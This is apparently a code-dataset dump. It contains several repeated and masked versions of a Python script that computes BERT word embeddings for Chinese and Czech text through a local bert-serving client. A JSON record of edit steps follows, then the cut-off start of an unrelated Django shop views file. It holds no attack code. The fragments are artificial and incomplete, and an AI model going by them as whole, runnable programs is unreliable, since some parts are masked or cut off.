batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
generate_bert('data/semeval15/cz.pas.dev.sent.txt',
'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt',
'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt',
'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)
<|reserved_special_token_1|>
import pickle
import numpy as np
from bert_serving.client import BertClient
from pyhanlp import *
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
bc = BertClient(ip='127.0.0.1')
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
generate_bert('data/semeval15/cz.pas.dev.sent.txt',
'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt',
'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt',
'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)
<|reserved_special_token_1|>
# -*- coding:utf-8 -*-
# Author: hankcs
# Date: 2019-01-13 15:01
import pickle
import numpy as np
from bert_serving.client import BertClient
from pyhanlp import *
# HanLP character table used to normalize full-/half-width characters
# before sending text to the BERT server.
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
# bc = BertClient(ip='192.168.1.88')  # ip address of the server
bc = BertClient(ip='127.0.0.1')  # ip address of the GPU machine
def embed_last_token(text):
    """Encode *text* with the BERT server and keep one vector per word.

    For every sentence, BERT's WordPiece tokens are re-aligned to the
    original whitespace-separated words; the vector of the *last*
    sub-token of each word is kept.

    :param text: list of whitespace-tokenized sentences (str).
    :return: list of arrays, one per sentence, of shape
        (num_words, hidden_size).
    """
    result = bc.encode(text, show_tokens=True)
    # print(result)
    batch = []
    for sent, tensor, tokens in zip(text, result[0], result[1]):
        valid = []  # indices of the last sub-token of each word
        tid = 0  # index of the word currently being re-assembled
        buffer = ''  # sub-token text accumulated so far for words[tid]
        words = sent.lower().split()  # BERT tokens are lower-cased
        for i, t in enumerate(tokens):
            if t == '[CLS]' or t == '[SEP]':
                continue
            else:
                if t.startswith('##'):
                    t = t[2:]  # strip WordPiece continuation marker
                elif t == '[UNK]':
                    # assumes one [UNK] covers exactly one character of
                    # the current word -- TODO confirm for this corpus
                    t = words[tid][len(buffer)]
                buffer += t
                if buffer == words[tid]:
                    # word fully re-assembled: keep this sub-token index
                    valid.append(i)
                    buffer = ''
                    tid += 1
        # print(len(valid))
        # exit()
        if len(valid) != len(sent.split()) or tid != len(words):
            # alignment failed -- dump diagnostics but keep going
            print(valid)
            print(sent.split())
            print(result[1])
        batch.append(tensor[valid, :])
    return batch
def embed_sum(text):
    """Encode *text* with the BERT server and average sub-token vectors.

    For every sentence, BERT's WordPiece tokens are re-aligned to the
    original whitespace-separated words and each word's vector is the
    mean of its sub-token vectors.

    :param text: list of whitespace-tokenized sentences (str).
    :return: list of arrays, one per sentence, of shape
        (num_words, hidden_size).
    """
    result = bc.encode(text, show_tokens=True)
    # print(result)
    batch = []
    for sent, tensor, tokens in zip(text, result[0], result[1]):
        token_tensor = []  # sub-token vectors of the word in progress
        sent_tensor = []  # one averaged vector per finished word
        tid = 0  # index of the word currently being re-assembled
        buffer = ''  # sub-token text accumulated so far for words[tid]
        words = sent.lower().split()  # BERT tokens are lower-cased
        for i, t in enumerate(tokens):
            if t == '[CLS]' or t == '[SEP]':
                continue
            else:
                if t.startswith('##'):
                    t = t[2:]  # strip WordPiece continuation marker
                elif t == '[UNK]':
                    # assumes one [UNK] covers exactly one character of
                    # the current word -- TODO confirm for this corpus
                    t = words[tid][len(buffer)]
                buffer += t
                token_tensor.append(tensor[i, :])
                if buffer == words[tid]:
                    # word complete: average its sub-token vectors
                    sent_tensor.append(np.stack(token_tensor).mean(axis=0))
                    token_tensor = []
                    buffer = ''
                    tid += 1
        # print(len(valid))
        # exit()
        if tid != len(words) or len(sent_tensor) != len(words):
            # alignment failed -- fatal here, unlike embed_last_token
            print(sent.split())
            print(tokens)
            exit()
        batch.append(np.stack(sent_tensor))
    return batch
def generate_bert(path, output, embed_fun=embed_sum):
    """Embed every non-empty line of *path* with BERT and pickle the result.

    Sentences are read one per line, normalized (HanLP char-table
    conversion plus a fixed set of character replacements), embedded in
    batches of 100 via *embed_fun*, and the accumulated list of
    per-sentence arrays is pickled to *output*.  Progress counts are
    printed after every batch.
    """
    # Characters rewritten before encoding, applied in this exact order.
    replacements = (('—', '-'), ('‘', "'"), ('…', '.'), ('坜', '壢'),
                    ('唛', '麦'), ('ㄅㄆㄇㄈ', '呀呀'), ('’', "'"))
    print(output)
    processed = 0
    vectors = []
    pending = []
    with open(path) as src:
        for raw in src:
            sentence = raw.strip()
            if not sentence:
                continue
            normalized = CharTable.convert(sentence)
            for old, new in replacements:
                normalized = normalized.replace(old, new)
            pending.append(normalized)
            if len(pending) % 100 == 0:
                vectors.extend(embed_fun(pending))
                processed += len(pending)
                print(processed)
                pending = []
        if pending:
            vectors.extend(embed_fun(pending))
            processed += len(pending)
            print(processed)
    with open(output, 'wb') as f:
        pickle.dump(vectors, f)
if __name__ == '__main__':
    # Pre-compute sum-pooled BERT embeddings for the SemEval-15 Czech PAS
    # splits; the commented-out calls below cover other corpora from
    # earlier runs.
    # generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)
    # generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)
    # generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)
    #
    # generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)
    # generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)
    # generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)
    generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',
                  embed_fun=embed_sum)
    generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',
                  embed_fun=embed_sum)
    generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',
                  embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5.1-pos/train.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',
# embed_fun=embed_sum)
# generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',
# embed_fun=embed_sum)
|
flexible
|
{
"blob_id": "38e167630519b73bffea4ff527bc7b7272a49f1a",
"index": 348,
"step-1": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total 
+= len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total 
+= len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-3": "<mask token>\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', \"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total 
+= len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-4": "import pickle\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\nbc = BertClient(ip='127.0.0.1')\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-').replace(\n '‘', \"'\").replace('…', '.').replace('坜', '壢').replace('唛',\n '麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', 
\"'\"))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n generate_bert('data/semeval15/cz.pas.dev.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt',\n 'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt',\n 'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)\n",
"step-5": "# -*- coding:utf-8 -*-\n# Author: hankcs\n# Date: 2019-01-13 15:01\nimport pickle\n\nimport numpy as np\nfrom bert_serving.client import BertClient\nfrom pyhanlp import *\n\nCharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')\n\n# bc = BertClient(ip='192.168.1.88') # ip address of the server\nbc = BertClient(ip='127.0.0.1') # ip address of the GPU machine\n\n\ndef embed_last_token(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n valid = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n if buffer == words[tid]:\n valid.append(i)\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if len(valid) != len(sent.split()) or tid != len(words):\n print(valid)\n print(sent.split())\n print(result[1])\n batch.append(tensor[valid, :])\n return batch\n\n\ndef embed_sum(text):\n result = bc.encode(text, show_tokens=True)\n # print(result)\n batch = []\n for sent, tensor, tokens in zip(text, result[0], result[1]):\n token_tensor = []\n sent_tensor = []\n tid = 0\n buffer = ''\n words = sent.lower().split()\n for i, t in enumerate(tokens):\n if t == '[CLS]' or t == '[SEP]':\n continue\n else:\n if t.startswith('##'):\n t = t[2:]\n elif t == '[UNK]':\n t = words[tid][len(buffer)]\n buffer += t\n token_tensor.append(tensor[i, :])\n if buffer == words[tid]:\n sent_tensor.append(np.stack(token_tensor).mean(axis=0))\n token_tensor = []\n buffer = ''\n tid += 1\n # print(len(valid))\n # exit()\n if tid != len(words) or len(sent_tensor) != len(words):\n print(sent.split())\n print(tokens)\n exit()\n batch.append(np.stack(sent_tensor))\n return batch\n\n\ndef generate_bert(path, output, embed_fun=embed_sum):\n print(output)\n total = 0\n with open(path) as src:\n 
batch = []\n tensor = []\n for line in src:\n line = line.strip()\n if len(line) == 0:\n continue\n batch.append(CharTable.convert(line).replace('—', '-')\n .replace('‘', '\\'')\n .replace('…', '.')\n .replace('坜', '壢')\n .replace('唛', '麦')\n .replace('ㄅㄆㄇㄈ', '呀呀')\n .replace('’', '\\''))\n if len(batch) and len(batch) % 100 == 0:\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n batch = []\n if len(batch):\n tensor.extend(embed_fun(batch))\n total += len(batch)\n print(total)\n with open(output, 'wb') as f:\n pickle.dump(tensor, f)\n\n\nif __name__ == '__main__':\n # generate_bert('data/SemEval-2016/news.test.sent.txt', 'data/SemEval-2016/news.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.valid.sent.txt', 'data/SemEval-2016/news.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/news.train.sent.txt', 'data/SemEval-2016/news.train.bert', embed_fun=embed_sum)\n #\n # generate_bert('data/SemEval-2016/text.test.sent.txt', 'data/SemEval-2016/text.test.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.valid.sent.txt', 'data/SemEval-2016/text.valid.bert', embed_fun=embed_sum)\n # generate_bert('data/SemEval-2016/text.train.sent.txt', 'data/SemEval-2016/text.train.bert', embed_fun=embed_sum)\n\n generate_bert('data/semeval15/cz.pas.dev.sent.txt', 'data/embedding/bert_base_sum/cz.pas.dev.bert',\n embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.pas.train.sent.txt', 'data/embedding/bert_base_sum/cz.pas.train.bert',\n embed_fun=embed_sum)\n generate_bert('data/semeval15/cz.id.pas.sent.txt', 'data/embedding/bert_base_sum/cz.id.pas.bert',\n embed_fun=embed_sum)\n\n # generate_bert('data/ctb5.1-pos/dev.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/test.short.sent.txt', 'data/embedding/bert_base_sum/ctb.pos.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5.1-pos/train.short.sent.txt', 
'data/embedding/bert_base_sum/ctb.pos.train.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/dev.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/msra/test.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.test.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/dev.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.dev.auto.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/msra/train.auto.short.sent.txt', 'data/embedding/bert_base_sum/msra.train.auto.bert',\n # embed_fun=embed_sum)\n\n # generate_bert('data/ctb5/dev.sent.txt', 'data/embedding/bert_base_sum/ctb.dev.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/test.sent.txt', 'data/embedding/bert_base_sum/ctb.test.bert',\n # embed_fun=embed_sum)\n # generate_bert('data/ctb5/train.sent.txt', 'data/embedding/bert_base_sum/ctb.train.bert',\n # embed_fun=embed_sum)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from django.shortcuts import *
from shop.models import *
from django.db import transaction
from django.core.exceptions import *
@transaction.atomic
def computers(request):
    """List computers, optionally narrowed by a POSTed search form.

    GET renders the full catalogue; POST filters the queryset by
    case-insensitive substrings (id / cpu / graphics card / brand),
    numeric min/max ranges (min inclusive, max exclusive) and an
    optional sort key.  Non-integer range input renders the error page.
    """
    ctx = {'brand': Brand.objects.all()}
    computer = Computer.objects.all()
    if request.method == 'POST':
        params = request.POST  # hoist the repeated QueryDict lookups

        # Substring filters; empty or missing fields are simply skipped
        # (`.get` avoids the KeyError the old `params['x']` could raise).
        if params.get('computer_id', ''):
            computer = computer.filter(
                computer_id__icontains=params['computer_id'])
        if params.get('cpu', ''):
            computer = computer.filter(cpu__icontains=params['cpu'])
        if params.get('graphics_card', ''):
            computer = computer.filter(
                graphics_card__icontains=params['graphics_card'])

        # Numeric range filters.  `exclude(field__gte=max)` keeps rows
        # strictly below max, i.e. the upper bound is exclusive.
        try:
            for field, min_key, max_key in (
                ('memory', 'minMemory', 'maxMemory'),
                ('ssd_capacity', 'minssd', 'maxssd'),
                ('disk_capacity', 'minDisk', 'maxDisk'),
            ):
                if params.get(min_key, ''):
                    computer = computer.filter(
                        **{field + '__gte': int(params[min_key])})
                if params.get(max_key, ''):
                    computer = computer.exclude(
                        **{field + '__gte': int(params[max_key])})
        except ValueError:
            return render(request, 'Dashio/error.html', {'error': "请输入整数"})

        if params.get('brand', ''):
            computer = computer.filter(brand__name__icontains=params['brand'])

        if params.get('sort', ''):
            # sortType is the ordering prefix ('' ascending, '-' descending).
            computer = computer.order_by(params['sortType'] + params['sort'])

    ctx['computer'] = computer
    return render(request, "Dashio/computers.html", ctx)
@transaction.atomic
def details(request, computer_id):
    """Render the detail page of one computer: offers, bookmarks, comments.

    404s when *computer_id* does not exist.  For logged-in users the
    context also carries the bookmark-toggle label ('收藏' / '取消收藏').
    """
    is_user = request.session['type'] == 'user'
    user_id = request.session['id']
    computer = get_object_or_404(Computer, pk=computer_id)
    rtx = {
        'isUser': is_user,
        'computer': computer,
        'user_id': user_id,
        'markAmount': mark.objects.filter(
            computer_id__computer_id=computer_id).count(),
        'sell': Sell.objects.filter(computer_id__computer_id=computer_id),
        'sellAmount': Buy.objects.filter(
            computer_id__computer_id=computer_id).count(),
        'comments': computer_comment.objects.filter(
            computer_id__computer_id=computer_id).order_by('-comment_date'),
        'buys': Buy.objects.filter(
            computer_id__computer_id=computer_id).order_by('-buy_time')[:5],
    }
    if is_user:
        # Label reflects the current bookmark state for this user.
        already_marked = mark.objects.filter(
            user_id__user_id=user_id, computer_id=computer).count() != 0
        rtx['mark'] = '取消收藏' if already_marked else '收藏'
    return render(request, 'Dashio/computer_detail.html', rtx)
@transaction.atomic
def post(request, user_id, computer_id):
    """Save a new comment from *user_id* on *computer_id*, then redirect.

    Uses get_object_or_404 (consistent with makeMark) so an unknown user
    or computer id yields a 404 page instead of an uncaught
    DoesNotExist (HTTP 500).  Non-POST requests just redirect back.
    """
    if request.method == 'POST':
        computer = get_object_or_404(Computer, pk=computer_id)
        user = get_object_or_404(User, pk=user_id)
        computer_comment(
            computer_id=computer,
            user_id=user,
            content=request.POST['comment'],
        ).save()
    return HttpResponseRedirect(reverse('shop:computerDetail', args=(computer_id, )))
@transaction.atomic
def makeMark(request, computer_id, user_id):
    """Toggle the bookmark of *computer_id* for *user_id*, then redirect.

    Wrapped in a transaction — consistent with the other views — so the
    check-then-act get/delete-or-create sequence is atomic.
    """
    try:
        # Already bookmarked: a second click removes the bookmark.
